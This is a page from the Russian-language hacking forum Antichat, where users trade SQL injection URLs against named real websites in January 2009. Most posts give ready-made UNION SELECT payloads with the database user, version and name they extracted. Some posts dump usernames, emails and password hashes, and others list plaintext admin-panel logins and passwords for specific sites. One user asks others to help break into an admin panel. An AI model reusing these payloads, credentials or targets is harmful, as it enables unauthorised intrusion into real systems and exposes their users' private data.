ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7411  
Старый 08.01.2009, 22:07
Аватар для _evgeniy_
_evgeniy_
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982

Репутация: 26
По умолчанию

Код:
http://www.cdma.kh.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3
plintys_gsm@localhost:5.0.51a-community-log: plintys_cdma

Код:
http://www.cdma.kh.ua/forum/admin/
login: pv
pass: 2005

Код:
http://www.p-m.com.ua/news/index.php?view=bulletin&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database()),5
pminua_pm@localhost:5.0.51a-community-log: pminua_pmcomua

Код:
http://www.m-m.com.ua/article/index.php?view=article&id=-999%20union%20select%201,2,3,concat(user(),0x3a,version(),0x3a,database())
mmcomua_tok@localhost:5.0.51a-community-log:mmcomua_mm

Код:
http://kdsk.com.ua/gallery.php?imID=-999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6
kdskcom_site@localhost:5.0.51a-community-log:kdskcom_site

Код:
http://www.tet.kharkov.ua/articles/index.php?view=article&id=-999%20union%20select%201,concat(user(),0x3a,version(),0x3a,database()),3
tetkhua_tetkha@localhost:5.0.51a-community-log:tetkhua_tetkha

Код:
http://www.tet.kharkov.ua/forum/admin/
login: tet
pass: tet2008

Код:
http://www.danica-biola.com.ua/resource.php?id_serv=-999+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3
danica_db@localhost:5.0.51a-community-log:danica_biolacomua

Код:
http://www.legion.kharkov.ua/publication/?view=publication&id=-999+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())
legion_val@localhost:5.0.51a-community-log:legion_leg

Код:
http://www.afh.kharkov.ua/catalogue/index.php?id=4+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6
plintys_afh@localhost:5.0.51a-community-log: plintys_afh

Последний раз редактировалось _evgeniy_; 08.01.2009 в 22:10..
 
Ответить с цитированием

  #7412  
Старый 08.01.2009, 23:21
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

PR 7
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,table_name,3,4,5,6+from+INFORMAT ION_SCHEMA.TABLES--

Выводятся все таблицы и колонки =)
 
Ответить с цитированием

  #7413  
Старый 09.01.2009, 09:28
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

http://www.compasspoint.org/boardcafe/details.php?id=414114+union+select+1,2,3,4,concat_ ws(0x3a3a,version(),user(),database()),6,7,8,9,10, 11,12,13,14,15,16,17,18,19--

5.0.22-log
compasspoint@www.44fish.com
compasspoint

http://www.aeo.com.pk/indexnew.php?id=9999914+union+select+1,2,concat_ws (0x3a3a,version(),user(),database()),4,5,6,7--

5.0.51a-community-log
aeodb@72.51.46.233
aeo


http://www.alreves.org/artists.php?lang=br&cod_artist=88888810+union+sele ct+1,2,3,concat_ws(0x3a3a,version(),user(),databas e()),5,6--

5.0.67-community-log
alreveso_alreves@localhost
alreveso_alreves

http://www.adhesivetape.net/product_details.php?id=1488888+union+select+1,2,3, concat_ws(0x3a3a,version(),user(),database())--

5.0.67-community-nt-log
taperange@redhat.rcc.kudoswebdesign.com
taperange

http://improvised.emagine.ie/news_det.php?id=1799999+union+select+1,2,3,4,conca t_ws(0x3a3a,version(),user(),database()),6,7,8,9,1 0,11,12--

5.0.45-log
improvi_admin@web11.hosting365.ie
improvi_database
 
Ответить с цитированием

  #7414  
Старый 09.01.2009, 10:21
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Novel Games - Good Games for Your Whole Family
Код:
http://www.novelgames.com/gamelicense/codes.php?id=-8+union+select+concat(version(),0x3a,user(),0x3a,database())--
user(): oceanworld@localhost
version(): 4.1.10-log
database(): novelgames

тИЦ: 80
PR: 5


Группа компаний Icon Communications
Код:
http://iconcom.ru/page.php?id=-8+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5--
user(): doron@stat.interventio.ru
version(): 4.0.20-log
database(): glance_db

PR: 2
 
Ответить с цитированием

  #7415  
Старый 09.01.2009, 14:17
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

эх давно я тут не постил...


Российская Ассоциация Политической Науки
PR 6
тИЦ 180

http://www.rapn.ru/index.php?grup=634&doc=-2637%20union%20select%20username,user_email,3,4,5, user_password%20from%20rapn_users--
 
Ответить с цитированием

  #7416  
Старый 09.01.2009, 15:25
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.myworldhardware.com/v4/articles.php?ID=104&Page_ID=-1+union+select+1,2,3,concat(name,0x3a,mgroup,0x3a,password,0x3a,email),5%20from%20ibf_members+limit+2,1--
Имя: группа: пасс: мыло
rkcs:4:56defccc63de74d71ae919ab1ecae656:rkcs@mywor ldhardware.com
 
Ответить с цитированием

  #7417  
Старый 09.01.2009, 16:04
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

LOSINGTODAY.COM - THE INDIE MUSIC MAGAZINE

http://www.losingtoday.com/news.php?id=9991475+union+select+1,2,concat_ws(0x3 a3a,version(),user(),database()),4,5,6,7,8,9,10--&news_alpha=f

4.0.17-standard
admin_root@localhost
admin_losingtoday

http://www.bali-koe.com/details.php?id=8888812+union+select+1,2,3,4,5,6,7, concat_ws(0x3a3a,version(),user(),database()),9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--


4.1.22-standard
jnarwast_etd@localhost
jnarwast_balikoe


http://www.monarchwatch.org/waystations/registry/detail.php?id=148912345+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a3a,vers ion(),user(),database()),19--

4.1.22-standard
monarchw_ws@localhost
monarchw_waystation
 
Ответить с цитированием

  #7418  
Старый 09.01.2009, 17:31
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

biogeodb.stri.si.edu PR -5

PHP код:
http://biogeodb.stri.si.edu/herbarium/search/quick/?search_key=antichat-forevo')union+select+1,2,3,unhex(hex(concat_ws(0x2f,id_users,email,password,status))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+test.tbl_users/* 
PageRank: 8 тИЦ: 140

PHP код:
http://www.sju.edu/academics/hsb/campbell/research-guides/index-new2.php?subid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,SCHEMA_NAME,17+from+INFORMATION_SCHEMA.SCHEMATA/* 

Последний раз редактировалось AkyHa_MaTaTa; 09.01.2009 в 21:51..
 
Ответить с цитированием

  #7419  
Старый 09.01.2009, 21:56
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.daiso.ro/lista_magazine.php?judet=-6'+UNION+SELECT+CONCAT_WS(0x3a,version(),database( ),user())/*

Database Version: 5.0.32-Debian_7-log
Database name: daiso
User name: daiso@localhost

админка www.daiso.ro/admin

есть маленькая проблемка, данные из БД не подходят к админке, если посмотреть на сервак по реверс айпи то 99% из сайтов на хостинге имеют один и тот же движок и админка у них у всех одинаковая, то есть по одному и тому же адресу..выскакивает окошко куда надо ввести логин и пасс... если у кого нибудь получтся зайти в админку , большая просьба проинформировать меня. Спасибо
 
Ответить с цитированием

  #7420  
Старый 09.01.2009, 23:06
Аватар для fortune
fortune
Новичок
Регистрация: 08.01.2009
Сообщений: 5
Провел на форуме:
14109

Репутация: 11
По умолчанию

Цитата:
Сообщение от hackmen  
PR 7
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,table_name,3,4,5,6+from+INFORMAT ION_SCHEMA.TABLES--

Выводятся все таблицы и колонки =)
Код:
http://www.northeastern.edu/gradstudies/stories/index.php?id=-86+union+select+1,concat(username,0x3a,password),3,4,5,6+from+coop_evaluation.users--
but cant dehash pass
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ